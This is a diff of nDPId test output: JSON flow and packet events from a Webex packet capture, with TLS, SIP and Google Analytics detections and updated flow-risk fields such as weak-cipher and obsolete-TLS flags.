+01395{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":365,"source":"webex.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636259,"flow_last_seen":1444570636894,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":667,"midstream":0,"ts_msec":1444570636894,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.100","src_port":52219,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}}
+01394{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":368,"source":"webex.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636264,"flow_last_seen":1444570636897,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":667,"midstream":0,"ts_msec":1444570636897,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.99","src_port":55969,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}}
+01395{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":381,"source":"webex.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570636155,"flow_last_seen":1444570636963,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2527,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":496,"midstream":0,"ts_msec":1444570636963,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.204.49","src_port":51646,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":409,"source":"webex.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570637191,"flow_last_seen":1444570637191,"flow_idle_time":180000,"flow_min_l4_payload_len":656,"flow_max_l4_payload_len":656,"flow_tot_l4_payload_len":656,"flow_avg_l4_payload_len":656,"midstream":0,"ts_msec":1444570637191,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"172.16.1.75","src_port":64538,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01305{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":409,"source":"webex.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1444570637191,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":698,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":698,"pkt_l4_len":664,"ts_msec":1444570637191,"pkt":"ABoRAAACABoRAAABCABFAAKsAABAAEARgN0KCAABrBABS\/waE8QCmKnIUkVHSVNURVIgc2lwOjE3Mi4xNi4xLjc1O3RyYW5zcG9ydD1VRFAgU0lQLzIuMA0KVmlhOiBTSVAvMi4wL1VEUCAxMC4xMzMuMjA2LjQ3OjY0NTM4O2JyYW5jaD16OWhHNGJLLTUyNDI4Ny0xLS0tM2U0Njk4NjE4Y2ZiMmI3MztycG9ydA0KTWF4LUZvcndhcmRzOiA3MA0KQ29udGFjdDogPHNpcDo0NTE5MUAxMC4xMzMuMjA2LjQ3OjY0NTM4O3JpbnN0YW5jZT03YTQ2ZjFlMTI3MDJlN2ZiO3RyYW5zcG9ydD1VRFA+DQpUbzogPHNpcDo0NTE5MUAxNzIuMTYuMS43NTt0cmFuc3BvcnQ9VURQPg0KRnJvbTogPHNpcDo0NTE5MUAxNzIuMTYuMS43NTt0cmFuc3BvcnQ9VURQPjt0YWc9ZDM4MzM3NjcNCkNhbGwtSUQ6IEtvcExUdzl4c19sRXBDdGlQYTA3YlEuLg0KQ1NlcTogNCBSRUdJU1RFUg0KRXhwaXJlczogNjANCkFsbG93OiBJTlZJVEUsIEFDSywgQ0FOQ0VMLCBCWUUsIE5PVElGWSwgUkVGRVIsIE1FU1NBR0UsIE9QVElPTlMsIElORk8sIFNVQlNDUklCRQ0KU3VwcG9ydGVkOiByZXBsYWNlcywgbm9yZWZlcnN1YiwgZXh0ZW5kZWQtcmVmZXIsIHRpbWVyLCBvdXRib3VuZCwgcGF0aCwgWC1jaXNjby1zZXJ2aWNldXJpDQpVc2VyLUFnZW50OiBab2lwZXIgcjMzNjg4DQpBbGxvdy1FdmVudHM6IHByZXNlbmNlLCBrcG1sDQpDb250ZW50LUxlbmd0aDogMA0KDQo="}
-00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":409,"source":"webex.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570637191,"flow_last_seen":1444570637191,"flow_idle_time":180000,"flow_min_l4_payload_len":656,"flow_max_l4_payload_len":656,"flow_tot_l4_payload_len":656,"flow_avg_l4_payload_len":656,"midstream":0,"ts_msec":1444570637191,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"172.16.1.75","src_port":64538,"dst_port":5060,"l4_proto":"udp","ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
-01210{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":411,"source":"webex.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570636252,"flow_last_seen":1444570638198,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2842,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":496,"midstream":0,"ts_msec":1444570638198,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.202.139","src_port":47116,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}}
-01209{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":412,"source":"webex.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636270,"flow_last_seen":1444570638199,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":661,"midstream":0,"ts_msec":1444570638199,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.200.11","src_port":47841,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}}
+00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":409,"source":"webex.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570637191,"flow_last_seen":1444570637191,"flow_idle_time":180000,"flow_min_l4_payload_len":656,"flow_max_l4_payload_len":656,"flow_tot_l4_payload_len":656,"flow_avg_l4_payload_len":656,"midstream":0,"ts_msec":1444570637191,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"172.16.1.75","src_port":64538,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+01396{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":411,"source":"webex.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570636252,"flow_last_seen":1444570638198,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2842,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":496,"midstream":0,"ts_msec":1444570638198,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.202.139","src_port":47116,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}}
+01395{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":412,"source":"webex.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636270,"flow_last_seen":1444570638199,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":661,"midstream":0,"ts_msec":1444570638199,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.200.11","src_port":47841,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}}
 00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":422,"source":"webex.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570638225,"flow_last_seen":1444570638225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1444570638225,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"216.58.208.40","src_port":43433,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":422,"source":"webex.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1444570638225,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1444570638225,"pkt":"ABoRAAACABoRAAABCABFAAA8UR1AAEAGNzMKCAAB2DrQKKmpAbtoC5J\/AAAAAKACOQjy7gAAAgQFtAQCCAoATMNiAAAAAAEDAwY="}
 00444{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":423,"source":"webex.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1444570638234,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570638234,"pkt":"ABoRAAACABoRAAABCABFAAAoAeFAABAGtoPYOtAoCggAAQG7qamX9G2AaAuSgFAS\/\/9SAQAA"}
 01305{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":430,"source":"webex.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1444570638237,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":698,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":698,"pkt_l4_len":664,"ts_msec":1444570638237,"pkt":"ABoRAAACABoRAAABCABFAAKsAABAAEARgN0KCAABrBABS\/waE8QCmKnIUkVHSVNURVIgc2lwOjE3Mi4xNi4xLjc1O3RyYW5zcG9ydD1VRFAgU0lQLzIuMA0KVmlhOiBTSVAvMi4wL1VEUCAxMC4xMzMuMjA2LjQ3OjY0NTM4O2JyYW5jaD16OWhHNGJLLTUyNDI4Ny0xLS0tM2U0Njk4NjE4Y2ZiMmI3MztycG9ydA0KTWF4LUZvcndhcmRzOiA3MA0KQ29udGFjdDogPHNpcDo0NTE5MUAxMC4xMzMuMjA2LjQ3OjY0NTM4O3JpbnN0YW5jZT03YTQ2ZjFlMTI3MDJlN2ZiO3RyYW5zcG9ydD1VRFA+DQpUbzogPHNpcDo0NTE5MUAxNzIuMTYuMS43NTt0cmFuc3BvcnQ9VURQPg0KRnJvbTogPHNpcDo0NTE5MUAxNzIuMTYuMS43NTt0cmFuc3BvcnQ9VURQPjt0YWc9ZDM4MzM3NjcNCkNhbGwtSUQ6IEtvcExUdzl4c19sRXBDdGlQYTA3YlEuLg0KQ1NlcTogNCBSRUdJU1RFUg0KRXhwaXJlczogNjANCkFsbG93OiBJTlZJVEUsIEFDSywgQ0FOQ0VMLCBCWUUsIE5PVElGWSwgUkVGRVIsIE1FU1NBR0UsIE9QVElPTlMsIElORk8sIFNVQlNDUklCRQ0KU3VwcG9ydGVkOiByZXBsYWNlcywgbm9yZWZlcnN1YiwgZXh0ZW5kZWQtcmVmZXIsIHRpbWVyLCBvdXRib3VuZCwgcGF0aCwgWC1jaXNjby1zZXJ2aWNldXJpDQpVc2VyLUFnZW50OiBab2lwZXIgcjMzNjg4DQpBbGxvdy1FdmVudHM6IHByZXNlbmNlLCBrcG1sDQpDb250ZW50LUxlbmd0aDogMA0KDQo="}
 00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":449,"source":"webex.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1444570639260,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570639260,"pkt":"ABoRAAACABoRAAABCABFAAAoUR5AAEAGN0YKCAAB2DrQKKmpAbtoC5KAl\/RtgVAQOQgY+gAA"}
-00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":455,"source":"webex.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570638225,"flow_last_seen":1444570639266,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1444570639266,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"216.58.208.40","src_port":43433,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ssl.google-analytics.com","ja3":"75edb912bc6f0a222ae3e3e47f5c89b1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00968{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":455,"source":"webex.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570638225,"flow_last_seen":1444570639266,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1444570639266,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"216.58.208.40","src_port":43433,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ssl.google-analytics.com","ja3":"75edb912bc6f0a222ae3e3e47f5c89b1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 01305{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":457,"source":"webex.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1444570639266,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":698,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":698,"pkt_l4_len":664,"ts_msec":1444570639266,"pkt":"ABoRAAACABoRAAABCABFAAKsAABAAEARgN0KCAABrBABS\/waE8QCmKnIUkVHSVNURVIgc2lwOjE3Mi4xNi4xLjc1O3RyYW5zcG9ydD1VRFAgU0lQLzIuMA0KVmlhOiBTSVAvMi4wL1VEUCAxMC4xMzMuMjA2LjQ3OjY0NTM4O2JyYW5jaD16OWhHNGJLLTUyNDI4Ny0xLS0tM2U0Njk4NjE4Y2ZiMmI3MztycG9ydA0KTWF4LUZvcndhcmRzOiA3MA0KQ29udGFjdDogPHNpcDo0NTE5MUAxMC4xMzMuMjA2LjQ3OjY0NTM4O3JpbnN0YW5jZT03YTQ2ZjFlMTI3MDJlN2ZiO3RyYW5zcG9ydD1VRFA+DQpUbzogPHNpcDo0NTE5MUAxNzIuMTYuMS43NTt0cmFuc3BvcnQ9VURQPg0KRnJvbTogPHNpcDo0NTE5MUAxNzIuMTYuMS43NTt0cmFuc3BvcnQ9VURQPjt0YWc9ZDM4MzM3NjcNCkNhbGwtSUQ6IEtvcExUdzl4c19sRXBDdGlQYTA3YlEuLg0KQ1NlcTogNCBSRUdJU1RFUg0KRXhwaXJlczogNjANCkFsbG93OiBJTlZJVEUsIEFDSywgQ0FOQ0VMLCBCWUUsIE5PVElGWSwgUkVGRVIsIE1FU1NBR0UsIE9QVElPTlMsIElORk8sIFNVQlNDUklCRQ0KU3VwcG9ydGVkOiByZXBsYWNlcywgbm9yZWZlcnN1YiwgZXh0ZW5kZWQtcmVmZXIsIHRpbWVyLCBvdXRib3VuZCwgcGF0aCwgWC1jaXNjby1zZXJ2aWNldXJpDQpVc2VyLUFnZW50OiBab2lwZXIgcjMzNjg4DQpBbGxvdy1FdmVudHM6IHByZXNlbmNlLCBrcG1sDQpDb250ZW50LUxlbmd0aDogMA0KDQo="}
 00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":461,"source":"webex.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570640269,"flow_last_seen":1444570640269,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1444570640269,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.202.139","src_port":47135,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":461,"source":"webex.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1444570640269,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1444570640269,"pkt":"ABoRAAACABoRAAABCABFAAA8fMBAAEAGd0oKCAABch3Ki7gfAbudV783AAAAAKACOQjtmQAAAgQFtAQCCAoATMP3AAAAAAEDAwY="}
@@ -180,19 +180,19 @@
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":500,"source":"webex.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1444570640389,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1444570640389,"pkt":"ABoRAAACABoRAAABCABFAAA8c3ZAAEAGE5IKCAABQERpZ6GyAbtpybCOAAAAAKACOQjY0wAAAgQFtAQCCAoATMRfAAAAAAEDAwY="}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":502,"source":"webex.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1444570640395,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1444570640395,"pkt":"ABoRAAACABoRAAABCABFAAA8tGlAAEAGXWQKCAABPm3geMe+AbssX3BwAAAAAKACOQi6+AAAAgQFtAQCCAoATMR8AAAAAAEDAwY="}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":504,"source":"webex.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1444570640399,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1444570640399,"pkt":"ABoRAAACABoRAAABCABFAAA82ZRAAEAGODkKCAABPm3geMe\/Abvolh2LAAAAAKACOQhRpAAAAgQFtAQCCAoATMR9AAAAAAEDAwY="}
-00828{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":509,"source":"webex.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640269,"flow_last_seen":1444570640404,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"ts_msec":1444570640404,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.202.139","src_port":47135,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00828{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":512,"source":"webex.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640284,"flow_last_seen":1444570640404,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"ts_msec":1444570640404,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.213.212","src_port":41757,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00827{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":515,"source":"webex.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640298,"flow_last_seen":1444570640404,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"ts_msec":1444570640404,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.204.49","src_port":51676,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
